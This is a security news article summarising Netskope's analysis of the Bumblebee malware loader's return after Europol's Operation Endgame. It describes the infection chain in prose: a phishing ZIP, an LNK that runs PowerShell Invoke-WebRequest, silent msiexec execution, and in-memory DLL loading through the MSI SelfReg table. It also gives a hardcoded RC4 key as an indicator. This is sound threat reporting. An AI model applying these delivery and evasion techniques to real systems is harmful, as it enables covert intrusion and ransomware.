Bumblebee Malware Campaigns Resurface with Phishing and MSI Techniques Deliver Silent Payloads
Bumblebee Malware Campaigns Resurface with Phishing and MSI Techniques Deliver Silent Payloads
The Bumblebee malware, linked to ransomware deployments, has resurfaced after being disrupted in May 2024 by Europol's 'Operation Endgame.' The operation targeted multiple malware botnets, including Bumblebee, IcedID, and Pikabot, temporarily halting their activity. However, recent research from Netskope suggests that Bumblebee is back, employing familiar infection tactics such as phishing, malvertising, and SEO poisoning. Bumblebee is often used to provide threat actors with access to victim networks, enabling the deployment of payloads such as Cobalt Strike beacons, information-stealing malware, and ransomware. The resurgence of Bumblebee demonstrates its value to cybercriminals and the challenge of deterring threat activity without arrests to prevent key actors from re-establishing infrastructure and adapting their tactics.
The attack chain observed in recent campaigns typically begins with a phishing email that entices the victim to download a ZIP archive. This archive contains an LNK file, which triggers a PowerShell 'Invoke-WebRequest' command to download and install a malicious .MSI file. The file is silently executed using the msiexec.exe process with the /qn option, allowing it to run without user interaction. A notable change in this version of Bumblebee is its stealthier technique, designed to avoid creating new processes that could trigger forensic artifacts. "In the analyzed version, Bumblebee uses a stealthier approach to avoid the creation of other processes and avoids writing the final payload to disk," Netskope explains, "such as the rundll32 process being created by msiexec."
Once the MSI file is executed, Netskope Threat Labs' analysis found that Bumblebee uses the SelfReg table within the MSI structure to load the final DLL payload directly into memory, bypassing the need to write it to disk. The malware's unpacking process begins as soon as the DLL is invoked via the DllRegisterServer function. The most recent attacks analyzed by Netskope show that Bumblebee maintains key traits from its previous versions, including the use of a hardcoded RC4 key ("NEW_BLACK") to decrypt its configuration, which includes campaign IDs such as "msi" and "lnk001." Although there is limited information on the payloads Bumblebee is currently delivering, the resurgence of the malware points to a potential increase in ransomware attacks and other high-impact cyber threats in the coming months.